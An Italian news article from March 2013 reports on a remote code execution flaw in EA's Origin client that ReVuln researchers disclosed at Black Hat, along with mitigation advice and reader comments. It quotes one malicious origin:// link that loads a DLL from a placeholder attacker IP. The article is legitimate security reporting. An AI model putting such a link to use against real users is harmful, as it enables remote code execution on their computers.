Vulnerabilità Origin consente l'esecuzione di codice da remoto
Si tratta di un rischio exploit simile a quello rivenuto nel caso di Steam nello scorso ottobre.
di Rosario Grasso pubblicata il 19 Marzo 2013, alle 14:01 nel canale VideogamesSteam
Gli oltre 40 milioni di utenti di Origin potrebbero essere a rischio secondo le ricerche di un gruppo di programmatori italiani, che operano sotto l'etichetta ReVuln. La piattaforma di gioco online di Electronic Arts, infatti, consentirebbe a malintenzionati di eseguire codice sui computer dei giocatori in modalità remota.

L'attacco è stato dimostrato venerdì scorso in occasione della conferenza sulla sicurezza Black Hat che si è svolta ad Amsterdam. Servono pochi secondi per portare a termine la procedura e in alcuni casi non è necessaria alcuna interazione da parte delle vittime. L'attacco è basato sulla manipolazione del protocollo URL che viene utilizzato per l'avvio automatico dei giochi sui PC o sui Mac.
Sfruttando i difetti nell'applicazione Origin, sia nella sua variante Mac che in quella PC, quest'ultima può essere trasformata in uno strumento per attaccare gli utenti e installare silenziosamente malware sui computer di questi ultimi.
"La piattaforma Origin consente agli utenti malintenzionati di sfruttare le vulnerabilità locali attraverso il meccanismo di gestione degli URL", sostengono Donato Ferrante e Luigi Auriemma, i due ricercatori di ReVuln. "Un utente malitenzionato potrebbe creare un collegamento internet in modo da eseguire codice dannoso in modalità remota sul computer della vittima che ha installato Origin".
Ad Amsterdam, i due ricercatori hanno mostrato una demo in cui si vede come sia possibile eseguire codice da remoto su un computer con Origin e Crysis 3 installati. La piattaforma EA usa il link origin://LaunchGame/71503 per l'attivazione del gioco, ma anche gli utenti possono clickare su link come origin://LaunchGame/71503?CommandParams= -openautomate \\ATTACKER_IP\evil.dll. Nella demo si vedeva come in questo caso il client Origin caricasse una libreria a collegamento dinamico di Windows sul computer della vittima.
Electronic Arts, secondo quanto riporta Ars Technica, ha già inoltrato un comunicato ufficiale sulla faccenda. "Il nostro team indaga costantemente su problematiche come questa e aggiorniamo senza soluzione di continuità la nostra infrastruttura di sicurezza", è la posizione ufficiale di EA.
Si tratta di un attacco molto simile a quello dimostrato dagli stessi ricercatori nel caso di Steam. I due di ReVuln dimostravano come la piattaforma digitale di Valve fosse a rischio exploit per via del modo in cui gestisce il protocollo URL "steam://".
Grazie a protocolli di questo tipo si possono raggiungere delle pagine web in cui attivare un gioco o accedere a una particolare promozione, oppure per scaricare tool, leggere news, controllare i profili di altri giocatori. Ma con lo stesso sistema vengono gestiti altri tipi di comandi, come l'installazione e la disinstallazione dei giochi, la connessione ai server di gioco, l'esecuzione di un gioco.
In quell'occasione, i due ricercatori consigliavano agli utenti di disabilitare l'avvio automatico tramite gli URL "steam://". L'attacco attraverso Origin funziona, dunque, in modo molto simile, sfruttando la funzionalità che consente tramite web di avviare i giochi da remoto. Il comando che normalmente serve per avviare un gioco, infatti, può essere modificato al fine di indurre il PC a installare un programma dannoso.
Quando un link origin:// viene lanciato per la prima volta su un computer, i browser web tipicamente chiedono all'utente se vuole lanciare effettivamente il client Origin associato a quel tipo di link. I vari browser gestiscono in maniera differente questa operazione: alcuni mostrano all'utente il percorso web completo, mentre altri ne rivelano solamente una parte. Se l'utente conferma questo tipo di comportamento per il suo PC, allora tutti i link di quel tipo lanceranno la piattaforma Origin. In questo caso quell'utente non potrà più essere protetto da eventuali attacchi da remoto, e non serviranno ulteriori interazioni affinché avvenga la penetrazione di codice dannoso sul sistema. Gli utenti che vogliono mantenere un elevato livello di protezione dovrebbero invece assicurarsi che il sistema notifichi sempre del tentativo di lancio di un software associato a un URL di questo tipo.










Recensione OnePlus 15: potenza da vendere e batteria enorme dentro un nuovo design
AMD Ryzen 5 7500X3D: la nuova CPU da gaming con 3D V-Cache per la fascia media
SONY BRAVIA 8 II e BRAVIA Theatre System 6: il cinema a casa in formato compatto
Accise sui km percorsi invece che sul carburante: l'idea britannica per le auto elettriche
Offerta Amazon TOP: il richiestissimo Samsung Crystal 4K 2025 da 55'' scende a soli 345€
Qualcomm porta l'AI nei PC industriali con i nuovi processori Dragonwing IQ-X
UE pensa a nuovi dazi sui pacchi low cost: colpiti Shein e Temu
Evotrex promette la roulotte del futuro, con generatore e energia green
AMD non teme la bolla: gli investimenti nell'intelligenza artificiale sono una scommessa già vinta
Horizon Steel Frontiers: il nuovo MMORPG della saga salta PS5 e fa discutere i fan
DJI Neo 2: il nuovo mini drone da 151 grammi che decolla dal palmo della mano e segue ogni movimento
Svolta per le centrali a batteria: Peak Energy userà le batterie agli ioni di sodio
Truffa da 1 miliardo di dollari attraverso siti falsi: Google porta l'azienda cinese in tribunale
Oggi il Black Friday in anticipo fa crollare i prezzi di MacBook Pro chip M5, TV LG OLED e QNED, smartphone Samsung Galaxy e altro
Black Friday anticipato su Amazon: soundbar Hisense e LG da 240 e da 300W con subwoofer wireless in super offerta da 89,99€
ARC Raiders si espande con il nuovo aggiornamento: arriva la nuova mappa e un nemico più potente della Regina
Solo svantaggi per gli utenti: Apple prova a smontare (di nuovo) il DMA europeo con uno studio









8 Commenti
Gli autori dei commenti, e non la redazione, sono responsabili dei contenuti da loro inseriti - infoGuarda che non cambia nulla, l'unico modo è disinstallarlo, ti spiego il perchè: anche se è in background probabilmente l'url come succede anche per skype, email, steam ecc ecc... ti apre il programma anche se chiuso e ti esegue in ogni caso il codice.
Quindi le alternative sono: 1) o disinstalli finchè non patchano 2) si stà attenti a dove si preme che è in ogni caso e sempre la miglior soluzione.
In ogni caso è un codice che si esegue SOLO premendolo, come il 90% dei virus, quindi no-click no-malware
Quindi le alternative sono: 1) o disinstalli finchè non patchano 2) si stà attenti a dove si preme che è in ogni caso e sempre la miglior soluzione.
In ogni caso è un codice che si esegue SOLO premendolo, come il 90% dei virus, quindi no-click no-malware
Anche, l'importante è far sparire in qualche modo la matrice ovvero Origin.exe
Devi effettuare il login per poter commentare
Se non sei ancora registrato, puoi farlo attraverso questo form.
Se sei già registrato e loggato nel sito, puoi inserire il tuo commento.
Si tenga presente quanto letto nel regolamento, nel rispetto del "quieto vivere".